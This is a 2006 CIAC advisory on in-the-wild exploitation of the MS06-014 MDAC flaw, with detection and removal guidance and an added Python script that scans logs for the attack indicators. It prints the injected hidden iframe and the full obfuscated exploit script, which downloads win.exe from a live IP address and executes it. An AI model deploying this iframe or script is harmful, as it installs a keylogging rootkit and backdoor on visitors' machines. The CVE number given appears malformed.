CIAC INFORMATION BULLETIN

Q-327: Exploits of MDAC (MS06-014) Vulnerability in the Wild

September 29, 2006 19:00 GMT

PROBLEM: Numerous public websites have been compromised with a small <iframe> tag that downloads an exploit for the MS06-014 vulnerability in the Microsoft Data Access Components (see CIAC Bulletin: Q-171: Vulnerability in the Microsoft Data Access Components (MDAC) Function). The exploit downloads and installs a rootkit.
PLATFORM: Windows systems with MDAC 2.8 SP2 and earlier.
DAMAGE: A remote intruder can gain user access to a system.
SOLUTION: See CIAC Bulletin: Q-171: Vulnerability in the Microsoft Data Access Components (MDAC) Function, and apply the appropriate patches.

VULNERABILITY ASSESSMENT:
The risk is MEDIUM. Remote intruders can gain user access to a system.

LINKS:
  CIAC BULLETIN: http://www.ciac.org/ciac/bulletins/q-327.shtml
  PATCHES: http://www.ciac.org/ciac/bulletins/q-171.shtml
           http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
  CVE: CVE-2006-003

CIAC has information that an exploit for the Microsoft Data Access Components vulnerability (MS06-014) is in the wild.

Operation

The exploit is downloaded from public websites by unsuspecting visitors. The exploit starts with an <iframe> tag inserted at the very top of a public web page.

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" 
scrolling="no" name=counter></iframe>

The <iframe> tag creates a tiny, 1 by 1 pixel iframe and loads index.html into it. The file index.html contains a script that attempts to exploit the MDAC vulnerability in order to download and run the file win.exe. Note that win.exe will trigger antivirus scanners on most systems as a Trojan downloader.

<html>
<script>
<!--
function f(b, a, c) { return a + b + c; }
function g(b, a) { return a + b; }
var s = new Array
(
 "",
 "win.exe",
 "http://81.95.146.98/", "object",
 "classid",
 f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")), 
 g(f("ft.XMLH", "oso", "TTP"), "Micr"),
 f("E", "G", "T"),
 f(g(".Str", "odb"), "Ad", "eam"),
 f(g(".She", "ipt"), "WScr", "ll"),
 "PROCESS",
 "TMP",
 "/[^/]*$",
 "/",
 "\\"
);
a = document.createElement(s[3]);
a.setAttribute(s[4], s[5]);
with(a.CreateObject(s[6], s[0]))
{
 open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false);
 send();
 if(status < 400)
  with(a.CreateObject(s[8], s[0]))
  {
   Type = 1;
   Open();
   Write(responseBody);
   with(a.CreateObject(s[9], s[0]))
   {
    c = Environment(s[10])(s[11]) + s[14] + s[1];
    SaveToFile(c, 2);
    Exec(c);
   }
  }
}
location.replace(s[2]);
// -->
</script>
</html>

Note that most of the script exists only to obfuscate what it does.

The file win.exe is downloaded into the temp directory and run. It then installs the following rootkit files into the %windir%\system32 directory and runs them. Here %windir% is the current Windows directory (\windows, \winnt, etc.).

qo.dll
qo.sys
yvbb01.dll
yvbb01.sys
yvbb02.sys

The rootkit hides these files, installs a keyboard sniffer to capture logins, and opens a backdoor for intruder access to the system. The rootkit creates the following registry keys so that it loads as a service even in Safe Mode.

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\yvbb02.sys
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\yvbb02.sys
HKLM\SYSTEM\CurrentControlSet\Services\yvbb01
HKLM\SYSTEM\CurrentControlSet\Services\yvbb02

Detection

A compromised system can be detected by looking for network connections to 81.95.146.98 and for downloads of index.html or win.exe. To detect a compromised system by examining its files, you must get around the file hiding. To see the hidden files, remotely mount the file system and look for them in the %windir%\system32 directory; the file hiding does not work on a remotely mounted file system. Alternately, you can use the tool flister, available from:

http://invisiblethings.org/tools.html

Flister is a command line file lister that can see through the file hiding.
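The network-side detection described above, as an added example that is not part of the CIAC bulletin: it flags proxy log entries that contact 81.95.146.98 or fetch win.exe, and checks a web page for the injected 1x1 iframe. The indicators come from this bulletin; the Squid-style log lines, client addresses and HTML page are constructed samples.

```python
import re

# Indicators quoted in CIAC Q-327.
MALICIOUS_HOST = "81.95.146.98"
PAYLOAD_FILE = "win.exe"

# Squid native access.log: ts elapsed client code/status bytes method url ...
LOG_LINE = re.compile(
    r"^\S+\s+\S+\s+(?P<client>\S+)\s+\S+\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)")

# Any <iframe> whose src points at the malicious host. [^>]* also spans
# newlines, and the optional quote tolerates the unquoted src= seen in the wild.
IFRAME_RE = re.compile(
    r"<iframe[^>]*src=\s*[\"']?https?://" + re.escape(MALICIOUS_HOST) + r"[^>]*>",
    re.IGNORECASE)

# Constructed sample log: one client touches the malicious host twice,
# another fetches an ordinary intranet index.html that must not be flagged.
SAMPLE_LOG = """\
1159556400.123    45 10.0.0.7 TCP_MISS/200 4120 GET http://www.example.com/ - DIRECT/203.0.113.5 text/html
1159556401.456    12 10.0.0.7 TCP_MISS/200 1823 GET http://81.95.146.98/index.html - DIRECT/81.95.146.98 text/html
1159556402.789   310 10.0.0.7 TCP_MISS/200 77312 GET http://81.95.146.98/win.exe - DIRECT/81.95.146.98 application/octet-stream
1159556410.001    20 10.0.0.9 TCP_HIT/200 9000 GET http://intranet.example.com/index.html - NONE/- text/html
"""

# Constructed sample page carrying the injected iframe plus a benign one.
SAMPLE_PAGE = """<html><body>
<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1"
scrolling="no" name=counter></iframe>
<h1>Welcome</h1>
<iframe src="http://maps.example.com/embed" width="400" height="300"></iframe>
</body></html>"""

def find_suspect_requests(log_lines):
    """Return (client, url) for entries that contact the malicious host or
    fetch win.exe from any host. index.html alone is too common to flag."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = m.group("url")
        host = re.sub(r"^https?://", "", url).split("/", 1)[0].split(":", 1)[0]
        filename = url.rsplit("/", 1)[-1].split("?", 1)[0]
        if host == MALICIOUS_HOST or filename == PAYLOAD_FILE:
            hits.append((m.group("client"), url))
    return hits

def find_injected_iframes(html):
    """Return iframe tags loading content from the malicious host (webmaster check)."""
    return IFRAME_RE.findall(html)
```

Running find_suspect_requests over the sample log yields the two requests from 10.0.0.7, which is the host to examine with flister or a remote mount as described above.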

Removal

To remove the backdoor from a compromised system, you must first shut down the malicious services. The hidden services install themselves as “Miniport FT” and “Miniport FT32”, but in most cases they refused to stop when using the “net stop” command in a command window. To kill the services, remotely mount the file system and delete the malicious files from the %windir%\system32 directory. Reboot the system and make sure the files have not returned.

Now you can see and remove the registry keys listed above and all their subkeys. Search for the file names in the registry. You will also find them in the LEGACY_filename service keys such as LEGACY_YVBB02. Delete any keys that contain them.

Note that these directions only remove the initial rootkit and not any other software installed by the intruder.


CIAC services are available to DOE, DOE Contractors, and the NIH. CIAC can be contacted at:
    Voice:          +1 925-422-8193 (7 x 24)
    FAX:            +1 925-423-8002
    STU-III:        +1 925-423-2604
    E-mail:          ciac@ciac.org
    World Wide Web:  http://www.ciac.org/
    Anonymous FTP:   ftp.ciac.org

This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes.
UCRL-MI-119788